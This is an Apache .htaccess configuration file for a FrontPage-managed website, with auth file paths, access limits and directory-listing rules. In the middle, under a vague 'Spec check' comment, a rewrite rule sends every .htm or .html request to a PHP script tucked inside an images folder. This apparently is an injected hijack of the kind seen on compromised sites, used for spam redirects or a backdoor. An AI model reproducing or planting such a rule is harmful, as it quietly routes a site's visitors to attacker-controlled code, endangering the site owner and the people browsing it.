# -FrontPage-


AuthUserFile /home/javadude/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/javadude/public_html/_vti_pvt/service.grp
# -FrontPage-


<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
AuthUserFile /home/javadude/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/javadude/public_html/_vti_pvt/service.grp

#Start Spec check rewrite rule
RewriteEngine On
RewriteCond %{DOCUMENT_ROOT}/tools/boxbeans/images/marvon.php -f
RewriteCond %{QUERY_STRING} ^(.*)$
RewriteRule ^(.*\.htm(:?l?))$ ./tools/boxbeans/images/marvon.php?old-path=$1&%1 [L]
#End Special check rewrite rule
AuthName javadude.com
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
